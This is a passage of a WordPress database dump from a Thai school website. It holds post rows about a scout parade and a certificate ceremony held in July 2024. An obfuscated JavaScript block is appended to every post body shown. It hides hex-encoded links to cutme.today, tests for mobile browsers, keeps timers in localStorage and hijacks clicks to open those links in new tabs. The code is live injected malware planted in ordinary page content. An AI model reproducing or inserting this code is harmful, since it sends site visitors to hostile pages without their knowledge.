'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','กิจกรรมมอบเกียรติบัตรการเข้าร่วมกิจกรรมวันไหว้ครูและวันสุนทรภู่','','inherit','closed','closed','','66-revision-v1','','','2024-07-27 11:02:17','2024-07-27 04:02:17','',66,'http://pakhaeng.ssk.in.th/?p=68',0,'revision','',0),
(69,1,'2024-07-27 11:03:48','2024-07-27 04:03:48','<!-- wp:paragraph -->\n<p>วันที่ 1 กรกฎาคม พ.ศ.2567 นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียนบ้านหนองปลาเข็ง กอไหล่ เป็นประธานในพิธีทบทวนคำปฏิญาณและสวนสนามลูกเสือ เนื่องในวันคล้ายวันสถาปนาคณะลูกเสือแห่งชาติประจำปี 2567 ณ สนามโรงเรียนบ้านหนองปลาเข็ง กอไหล่ โดยมีผู้บังคับบัญชาลูกเสือ เข้าร่วมทำพิธีเพื่อน้อมรำลึกในพระมหากรุณาธิคุณในพระบาทสมเด็จพระมงกุฏเกล้าเจ้าอยู่หัว ผู้พระราชทานกำเนิดลูกเสือไทย และแสดงความจงรักภักดีแด่พระประมุขคณะลูกเสือแห่งชาติ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"93858553\",\"mediaId\":70,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-93858553\"><img class=\"gb-image gb-image-93858553\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/449338885_977488297502175_3280432045101593419_n.jpg\" alt=\"\" title=\"449338885_977488297502175_3280432045101593419_n\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%2Fposts%2Fpfbid0gw2DULBKYrBb4CYCe8sved4njQhyqSYuEfNeCg5bAa7S1K7S9kayoWSMuC7hNbPl&show_text=true&width=500\" width=\"500\" height=\"741\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','พิธีทบทวนคำปฏิญาณและสวนสนามลูกเสือ เนื่องในวันคล้ายวันสถาปนาคณะลูกเสือแห่งชาติประจำปี 2567','','publish','closed','closed','','%e0%b8%9e%e0%b8%b4%e0%b8%98%e0%b8%b5%e0%b8%97%e0%b8%9a%e0%b8%97%e0%b8%a7%e0%b8%99%e0%b8%84%e0%b8%b3%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%8d%e0%b8%b2%e0%b8%93%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%aa%e0%b8%a7','','','2024-07-27 11:03:54','2024-07-27 04:03:54','',0,'http://pakhaeng.ssk.in.th/?p=69',0,'post','',0),
(70,1,'2024-07-27 11:03:07','2024-07-27 04:03:07','','449338885_977488297502175_3280432045101593419_n','','inherit','','closed','','449338885_977488297502175_3280432045101593419_n','','','2024-07-27 11:03:07','2024-07-27 04:03:07','',69,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/449338885_977488297502175_3280432045101593419_n.jpg',0,'attachment','image/jpeg',0),
(71,1,'2024-07-27 11:03:44','2024-07-27 04:03:44','','449394860_977488040835534_2883094426265367481_n','','inherit','','closed','','449394860_977488040835534_2883094426265367481_n','','','2024-07-27 11:03:44','2024-07-27 04:03:44','',69,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/449394860_977488040835534_2883094426265367481_n.jpg',0,'attachment','image/jpeg',0),
(72,1,'2024-07-27 11:03:48','2024-07-27 04:03:48','<!-- wp:paragraph -->\n<p>วันที่ 1 กรกฎาคม พ.ศ.2567 นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียนบ้านหนองปลาเข็ง กอไหล่ เป็นประธานในพิธีทบทวนคำปฏิญาณและสวนสนามลูกเสือ เนื่องในวันคล้ายวันสถาปนาคณะลูกเสือแห่งชาติประจำปี 2567 ณ สนามโรงเรียนบ้านหนองปลาเข็ง กอไหล่ โดยมีผู้บังคับบัญชาลูกเสือ เข้าร่วมทำพิธีเพื่อน้อมรำลึกในพระมหากรุณาธิคุณในพระบาทสมเด็จพระมงกุฏเกล้าเจ้าอยู่หัว ผู้พระราชทานกำเนิดลูกเสือไทย และแสดงความจงรักภักดีแด่พระประมุขคณะลูกเสือแห่งชาติ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"93858553\",\"mediaId\":70,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-93858553\"><img class=\"gb-image gb-image-93858553\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/449338885_977488297502175_3280432045101593419_n.jpg\" alt=\"\" title=\"449338885_977488297502175_3280432045101593419_n\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%2Fposts%2Fpfbid0gw2DULBKYrBb4CYCe8sved4njQhyqSYuEfNeCg5bAa7S1K7S9kayoWSMuC7hNbPl&show_text=true&width=500\" width=\"500\" height=\"741\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 